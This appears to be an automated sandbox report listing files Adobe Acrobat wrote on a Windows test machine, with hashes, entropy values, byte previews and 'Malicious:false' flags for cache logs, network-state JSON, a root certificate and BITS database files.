                                                              Preview:...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                              C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                              Download File
                                                              Process:C:\Windows\System32\svchost.exe
                                                              File Type:Extensible storage user DataBase, version 0x620, checksum 0xd6aba6ab, page size 16384, DirtyShutdown, Windows version 10.0
                                                              Category:dropped
                                                              Size (bytes):1310720
                                                              Entropy (8bit):0.7556156320035918
                                                              Encrypted:false
                                                              SSDEEP:1536:dSB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:dazaSvGJzYj2UlmOlOL
                                                              MD5:BBE470D580C80FE426015C3F17E1D922
                                                              SHA1:9F3EF83D3BE6147D87B2912930A69A77DA79C1E1
                                                              SHA-256:2E0973823476E6C8FCAAD58788BB9C3322A2C42888B7EB17090237706C29E33D
                                                              SHA-512:0CA707793E7A1E7E6D0D32003C7D7AD1D707C2989B19AD72A78454D2D1BF67B9A500AF98115770989AC4157FACB28E74AFB5E3F7CA7A14A6F6ED0514B65E8E9A
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:...... .......7.......X\...;...{......................0.e......!...{?..8...|..h.g.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......9....{...............................................................................................................................................................................................2...{....................................mw.8...|..................M..s.8...|...........................#......h.g.....................................................................................................................................................................................................................................................................................................................................................

                                                              C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                              Download File
                                                              Process:C:\Windows\System32\svchost.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):16384
                                                              Entropy (8bit):0.07857276432469026
                                                              Encrypted:false
                                                              SSDEEP:3:eYeEE+vfNaAPaU1ly1lalluxmO+l/SNxOf:ezcNDPaUa1AgmOH
                                                              MD5:DAB295A7FDCE7E1FD18ED578167B1039
                                                              SHA1:CE8DC8B820918464D274E0254DB186A780C2A74B
                                                              SHA-256:C7EBE5DCF2AD97F3F8DBB616A08E4D7FA51153E66F447192B8C2FFD9FF998243
                                                              SHA-512:E1D9088F4D337DDC7E33A256E4363DE850FE50B05486B57326B7725E0AB4541275FF3D0150E18BD5D7076B856012DA7E3B34803BBF571B2F71D06D93DA20F903
                                                              Malicious:false
                                                              Preview:6.zU.....................................;...{...8...|...!...{?..........!...{?..!...{?..g...!...{?.................M..s.8...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

                                                              Download File
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):298
                                                              Entropy (8bit):5.221942875502474
                                                              Encrypted:false
                                                              SSDEEP:6:7WGcxFU89+q2PN72nKuAl9OmbnIFUt8OWGc/FN3JZmw+OWGc/FN39VkwON72nKui:7WGyUrvVaHAahFUt8OWGoV/+OWGoH5Oz
                                                              MD5:348759100D775A2425B85A64DFE7F9F0
                                                              SHA1:73BECB35C02BA2BDFDAAA009FC52CECC0A1989EC
                                                              SHA-256:AEA09028EFE326CF9DA038BB4B18868559334675CA99C63DD6B2CCDCF8CB2FF7
                                                              SHA-512:8019BA512D4EBD313E74066B1824FBF3FA83F7184DC2A2C839DFC312484421BE861C9BA6514EAE4B868FCF66B1C64273BAA56B449D3C5985313F863EA750019F
                                                              Malicious:false
                                                              Preview:2024/12/19-05:56:21.707 1c08 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/19-05:56:21.709 1c08 Recovering log #3.2024/12/19-05:56:21.709 1c08 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

                                                              Download File
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):298
                                                              Entropy (8bit):5.221942875502474
                                                              Encrypted:false
                                                              SSDEEP:6:7WGcxFU89+q2PN72nKuAl9OmbnIFUt8OWGc/FN3JZmw+OWGc/FN39VkwON72nKui:7WGyUrvVaHAahFUt8OWGoV/+OWGoH5Oz
                                                              MD5:348759100D775A2425B85A64DFE7F9F0
                                                              SHA1:73BECB35C02BA2BDFDAAA009FC52CECC0A1989EC
                                                              SHA-256:AEA09028EFE326CF9DA038BB4B18868559334675CA99C63DD6B2CCDCF8CB2FF7
                                                              SHA-512:8019BA512D4EBD313E74066B1824FBF3FA83F7184DC2A2C839DFC312484421BE861C9BA6514EAE4B868FCF66B1C64273BAA56B449D3C5985313F863EA750019F
                                                              Malicious:false
                                                              Preview:2024/12/19-05:56:21.707 1c08 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/19-05:56:21.709 1c08 Recovering log #3.2024/12/19-05:56:21.709 1c08 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

                                                              Download File
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):336
                                                              Entropy (8bit):5.167326899942531
                                                              Encrypted:false
                                                              SSDEEP:6:7WGcJMq2PN72nKuAl9Ombzo2jMGIFUt8OWGcJtvwgZmw+OWGcJtvwIkwON72nKuA:7WGkMvVaHAa8uFUt8OWGkSg/+OWGkSIi
                                                              MD5:93ABCD3BF11AA77629C5400ABEE4E619
                                                              SHA1:ECDE0CAC31810E840428375250ED7CCE4385C7FC
                                                              SHA-256:9E7056573405C1157F6C9D5A8DB347065675AE92C59B65DF9AC222127D10B714
                                                              SHA-512:A7956BE343C8FD3AFE2D43ACD9B014EF643CBBB3726C4EB9246EE808C5068D534A821267924C45F5A81BB6CFCE4E49153C0C140708B79BCB8C99EBD3559D16BE
                                                              Malicious:false
                                                              Preview:2024/12/19-05:56:21.912 40 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/19-05:56:21.914 40 Recovering log #3.2024/12/19-05:56:21.914 40 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

                                                              Download File
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):336
                                                              Entropy (8bit):5.167326899942531
                                                              Encrypted:false
                                                              SSDEEP:6:7WGcJMq2PN72nKuAl9Ombzo2jMGIFUt8OWGcJtvwgZmw+OWGcJtvwIkwON72nKuA:7WGkMvVaHAa8uFUt8OWGkSg/+OWGkSIi
                                                              MD5:93ABCD3BF11AA77629C5400ABEE4E619
                                                              SHA1:ECDE0CAC31810E840428375250ED7CCE4385C7FC
                                                              SHA-256:9E7056573405C1157F6C9D5A8DB347065675AE92C59B65DF9AC222127D10B714
                                                              SHA-512:A7956BE343C8FD3AFE2D43ACD9B014EF643CBBB3726C4EB9246EE808C5068D534A821267924C45F5A81BB6CFCE4E49153C0C140708B79BCB8C99EBD3559D16BE
                                                              Malicious:false
                                                              Preview:2024/12/19-05:56:21.912 40 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/19-05:56:21.914 40 Recovering log #3.2024/12/19-05:56:21.914 40 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\3a4619bd-26c0-4973-912c-540a8b295759.tmp

                                                              Download File
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):475
                                                              Entropy (8bit):4.971824627296864
                                                              Encrypted:false
                                                              SSDEEP:12:YH/um3RA8sq1ZhsBdOg2HIJnAcaq3QYiubcP7E4TX:Y2sRdswydMH0r3QYhbA7n7
                                                              MD5:F326539D084B03D88254A74D6018F692
                                                              SHA1:395B367E0E3554C3E78A8211F2D4B9F0F427CA87
                                                              SHA-256:9379694CADD7846403E1B6975502326FBC619E0E3A873BBB7BC2C03EE3623007
                                                              SHA-512:C8B5B1DD28605D3FCD9EF4A28BE1125137E6B3CB967F59CB2113656C8EFFFB3842115962DF8B25E9C3FA504F5E1B0A116D780326B1AB8062DC6AC0D80E7C3539
                                                              Malicious:false
                                                              Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341048370594526","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":151499},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.6","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\5cffbf16-1db4-45a3-973e-3a54b40e10d9.tmp

                                                              Download File
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:JSON data
                                                              Category:modified
                                                              Size (bytes):475
                                                              Entropy (8bit):4.975316331738347
                                                              Encrypted:false
                                                              SSDEEP:12:YH/um3RA8sqIEsBdOg2Hkfcaq3QYiubcP7E4TX:Y2sRds9dMHj3QYhbA7n7
                                                              MD5:54FE5726D4AFD840531272898C5E0DA8
                                                              SHA1:C170210857BCEA83E772A23541430ED295B6F827
                                                              SHA-256:D92EF1A8BC0B231CD5EF5513051026ED314CB2E66C73536CEFC77CD4AE9AF49C
                                                              SHA-512:3B31C6F34FAF720C964E8CB2FC74D6095B457C1419A63A8CE68703605602CFF49E4E44CBEBF9152CB5719364E616732E74D904C037446714BCAD07823BFCDF88
                                                              Malicious:false
                                                              Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379165793078530","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":591625},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.6","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

                                                              Download File
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):475
                                                              Entropy (8bit):4.971824627296864
                                                              Encrypted:false
                                                              SSDEEP:12:YH/um3RA8sq1ZhsBdOg2HIJnAcaq3QYiubcP7E4TX:Y2sRdswydMH0r3QYhbA7n7
                                                              MD5:F326539D084B03D88254A74D6018F692
                                                              SHA1:395B367E0E3554C3E78A8211F2D4B9F0F427CA87
                                                              SHA-256:9379694CADD7846403E1B6975502326FBC619E0E3A873BBB7BC2C03EE3623007
                                                              SHA-512:C8B5B1DD28605D3FCD9EF4A28BE1125137E6B3CB967F59CB2113656C8EFFFB3842115962DF8B25E9C3FA504F5E1B0A116D780326B1AB8062DC6AC0D80E7C3539
                                                              Malicious:false
                                                              Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341048370594526","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":151499},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.6","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State~RF4ef8bc.TMP (copy)

                                                              Download File
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):475
                                                              Entropy (8bit):4.971824627296864
                                                              Encrypted:false
                                                              SSDEEP:12:YH/um3RA8sq1ZhsBdOg2HIJnAcaq3QYiubcP7E4TX:Y2sRdswydMH0r3QYhbA7n7
                                                              MD5:F326539D084B03D88254A74D6018F692
                                                              SHA1:395B367E0E3554C3E78A8211F2D4B9F0F427CA87
                                                              SHA-256:9379694CADD7846403E1B6975502326FBC619E0E3A873BBB7BC2C03EE3623007
                                                              SHA-512:C8B5B1DD28605D3FCD9EF4A28BE1125137E6B3CB967F59CB2113656C8EFFFB3842115962DF8B25E9C3FA504F5E1B0A116D780326B1AB8062DC6AC0D80E7C3539
                                                              Malicious:false
                                                              Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341048370594526","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":151499},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.6","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

                                                              Download File
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):5449
                                                              Entropy (8bit):5.25238832384835
                                                              Encrypted:false
                                                              SSDEEP:96:av+Nkkl+2GAouz3z3xfNLUS3vHp5OuDzUrMzh28qXAXFP74LRXOtW7ANwE7+P7:av+Nkkl+2G1uz3zhfZUyPp5OuDzUwzh2
                                                              MD5:5580126203B163AC56187F0E85120EA2
                                                              SHA1:D7A0BE91249C7F94C95FDE95AE14C40A6AC44932
                                                              SHA-256:507733AAD38F79541D0751978FD17F41FAD90FE05BD68F833912511C91FEE8E6
                                                              SHA-512:466D973AEDD448C763A881F597BD6A1414401218552F35A4276FF756D90F473B56DCF93053087313ADAC457DAA4A7AC24311B8CABFC8A572D29410767D073339
                                                              Malicious:false
                                                              Preview:*...#................version.1..namespace-.X.Bo................next-map-id.1.Pnamespace-c291b69d_46f8_4b09_b54e_d05df8a1271d-https://rna-resource.acrobat.com/.0.>j.r................next-map-id.2.Snamespace-63b958a8_6f71_4fde_913c_6518794b9fd1-https://rna-v2-resource.acrobat.com/.1.J.4r................next-map-id.3.Snamespace-37e4c694_2a8d_4b31_9eb8_e65c5f9e16d5-https://rna-v2-resource.acrobat.com/.2..J.o................next-map-id.4.Pnamespace-d7426d52_3038_4cd9_b9cc_897232425509-https://rna-resource.acrobat.com/.3..M.^...............Pnamespace-c291b69d_46f8_4b09_b54e_d05df8a1271d-https://rna-resource.acrobat.com/..d.^...............Pnamespace-d7426d52_3038_4cd9_b9cc_897232425509-https://rna-resource.acrobat.com/.u..a...............Snamespace-63b958a8_6f71_4fde_913c_6518794b9fd1-https://rna-v2-resource.acrobat.com/..`aa...............Snamespace-37e4c694_2a8d_4b31_9eb8_e65c5f9e16d5-https://rna-v2-resource.acrobat.com/`v.Yo................next-map-id.5.Pnamespace-30587558_ed88_4bd8_adc0_

                                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

                                                              Download File
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):324
                                                              Entropy (8bit):5.142059846944746
                                                              Encrypted:false
                                                              SSDEEP:6:7WGdq2PN72nKuAl9OmbzNMxIFUt8OWGWNJZmw+OWGWNDkwON72nKuAl9OmbzNMFd:7WGdvVaHAa8jFUt8OWGWX/+OWGWF5Oav
                                                              MD5:74F853A2A7E67D2D6701DF718D99EB9F
                                                              SHA1:D54BDA70122EDFEDBCF2E7C0BD5B65875E583CAD
                                                              SHA-256:C5ACE681B0F3B6135C009042756603767B36A566C7BD3B1CB15B4BED6E89A17B
                                                              SHA-512:7674839A023FE5FABAED3E5269F5BBA3B742D61B2FF1494B69A6983538AF4CF40AC2CAEDD59666AEC156C33F6B105E6949B4B20DA02CACF595D0C942F3733C26
                                                              Malicious:false
                                                              Preview:2024/12/19-05:56:22.203 40 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/19-05:56:22.205 40 Recovering log #3.2024/12/19-05:56:22.205 40 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

                                                              Download File
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):324
                                                              Entropy (8bit):5.142059846944746
                                                              Encrypted:false
                                                              SSDEEP:6:7WGdq2PN72nKuAl9OmbzNMxIFUt8OWGWNJZmw+OWGWNDkwON72nKuAl9OmbzNMFd:7WGdvVaHAa8jFUt8OWGWX/+OWGWF5Oav
                                                              MD5:74F853A2A7E67D2D6701DF718D99EB9F
                                                              SHA1:D54BDA70122EDFEDBCF2E7C0BD5B65875E583CAD
                                                              SHA-256:C5ACE681B0F3B6135C009042756603767B36A566C7BD3B1CB15B4BED6E89A17B
                                                              SHA-512:7674839A023FE5FABAED3E5269F5BBA3B742D61B2FF1494B69A6983538AF4CF40AC2CAEDD59666AEC156C33F6B105E6949B4B20DA02CACF595D0C942F3733C26
                                                              Malicious:false
                                                              Preview:2024/12/19-05:56:22.203 40 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/19-05:56:22.205 40 Recovering log #3.2024/12/19-05:56:22.205 40 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                              C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-241219105625Z-168.bmp

                                                              Download File
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                              Category:dropped
                                                              Size (bytes):65110
                                                              Entropy (8bit):0.6376462682686903
                                                              Encrypted:false
                                                              SSDEEP:96:Fn1AGmY2nTLKnzN4lu1/4uy47rHMMMxAz:FsY2XQzyQnuc
                                                              MD5:1468EB269F45D6EECE72317AF6B1587F
                                                              SHA1:AB52469CD54F341F71D8EEA78E5293C597CC2560
                                                              SHA-256:56B0D18154217AEBE5F78DAA5DAF7861967BB4B615B7D1FFCDBC3C98C8834393
                                                              SHA-512:FFEF2EC31529E6165D9549A150FC8DA65917002B81A8E4747853AC7F51D88B3AC545862D5EB39684064EE600140C9D0BDAA97D14067C01AA24B17419950781FA
                                                              Malicious:false
                                                              Preview:BMV.......6...(...k...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                                                              Download File
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 11, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 11
                                                              Category:dropped
                                                              Size (bytes):86016
                                                              Entropy (8bit):4.445061474826369
                                                              Encrypted:false
                                                              SSDEEP:384:ye6ci5teiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:mxs3OazzU89UTTgUL
                                                              MD5:425E8FCB60B2AD4302966BB61BBBBDD2
                                                              SHA1:D1AF7194D78360782FD1E7B180DED14BCCEA0303
                                                              SHA-256:BBA0F265C9355560102555BD723E8D4C86945B6395EF137CA067CDE89E8A0E56
                                                              SHA-512:D405B2C68724654D81B71562C3157A1AE9165192D2223A84791E285FE411913265A89E0C634AB2AF0DF9BCF461ED37BE32B6413310192FF1D64FEACFC6C35680
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

                                                              Download File
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:SQLite Rollback Journal
                                                              Category:dropped
                                                              Size (bytes):8720
                                                              Entropy (8bit):3.7685655875815356
                                                              Encrypted:false
                                                              SSDEEP:48:7MYJioyVQioyhoy1C7oy16oy1uKOioy1noy1AYoy1Wioy1oioykioyBoy1noy1Oz:7fJuQLRXjBizb9IVXEBodRBkI
                                                              MD5:3842057B6004234DC1682BE1D1B904BD
                                                              SHA1:DFE7CB92414B1B79E95DBB2B547985069D5E893A
                                                              SHA-256:A2D414F365C9519A60C3F04F0BD8A097C4EDF7B43DE5E46FDC581A22E197B4BD
                                                              SHA-512:AEB760314FEC225ACA05AFDBBD078E9AF5DD023BDCC4EAB50F3BA8A2AD9D8451FAD60AB55B7AF98745ED5E16CE3BA67A09637B410F521556B80C4B7A4635E002
                                                              Malicious:false
                                                              Preview:.... .c.....c.*................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b.r.l...t...}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

                                                              Download File
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:Certificate, Version=3
                                                              Category:dropped
                                                              Size (bytes):1391
                                                              Entropy (8bit):7.705940075877404
                                                              Encrypted:false
                                                              SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                              MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                              SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                              SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                              SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                              Malicious:false
                                                              Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......

                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

                                                              Download File
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):192
                                                              Entropy (8bit):2.7673182398396405
                                                              Encrypted:false
                                                              SSDEEP:3:kkFklQudypl1fllXlE/HT8kv+h/ltNNX8RolJuRdxLlGB9lQRYwpDdt:kKJSyL2T8m+JdNMa8RdWBwRd
                                                              MD5:BA49A3EA6E6EE3032603FEB1BF933D78
                                                              SHA1:4A7FFF42D301205582870A9BAD6E7CF00E20C428
                                                              SHA-256:8C6758A8EDD12AE33A5C4D0F0A5FF64B4A4B50C17D4669EA34B2ACF1315275CB
                                                              SHA-512:74C69A800D1674E71D9C3FD46AC8D2A0B0A946E9D28C5161F8EB3D3E4B3424262FF45299FB7CD4205806AEF107905D0FFCF70266FA4F33D27C8822A63AF026F3
                                                              Malicious:false
                                                              Preview:p...... .............R..(....................................................... ..........W....................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

                                                              Download File
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):295
                                                              Entropy (8bit):5.341043750248797
                                                              Encrypted:false
                                                              SSDEEP:6:YEQXJ2HXBO+cmxSwR7HUnZiQ0YRMoAvJM3g98kUwPeUkwRe9:YvXKXBO+TLUcs/GMbLUkee9
                                                              MD5:2C335732D50313A7FCAB607CE917382F
                                                              SHA1:BD379427E210EF9D000AB0042EC141FB563F6CFC
                                                              SHA-256:922F8C68D33515BA8EB68DD223426B87A57207BD8497F938125DBF3084278A42
                                                              SHA-512:8E56C0E69CBEC620AE5BBDF854AEEDCE0670FAB20B09EBFAFC50754C538BD1BFF97E2B364610544A09B56D2956523C2358F9BDC5D2135BB3913D350231EBC835
                                                              Malicious:false
                                                              Preview:{"analyticsData":{"responseGUID":"624a841d-da44-40e8-a3e7-62f3691e7e40","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734783812885,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

                                                              Download File
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):294
                                                              Entropy (8bit):5.292093894146418
                                                              Encrypted:false
                                                              SSDEEP:6:YEQXJ2HXBO+cmxSwR7HUnZiQ0YRMoAvJfBoTfXpnrPeUkwRe9:YvXKXBO+TLUcs/GWTfXcUkee9
                                                              MD5:35565E485C0C676A54026C6D385E1B54
                                                              SHA1:E9CA3CA7F9CDA8073C5C8B187C6128D77DCB0679
                                                              SHA-256:B77B57DBAA03246528A00866076E31E905C28C7387FDD04C8D9A034FC78B44C6
                                                              SHA-512:6CFCBD9E0278633C42A82DBBEEA68F42ED60E46A9AAE522CD200D8B6D77115E3B717EC98642EF887F041B784E9B904F0D1D2C8F8494DBC94809356587E975480
                                                              Malicious:false
                                                              Preview:{"analyticsData":{"responseGUID":"624a841d-da44-40e8-a3e7-62f3691e7e40","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734783812885,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

                                                              Download File
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):294
                                                              Entropy (8bit):5.272111610962777
                                                              Encrypted:false
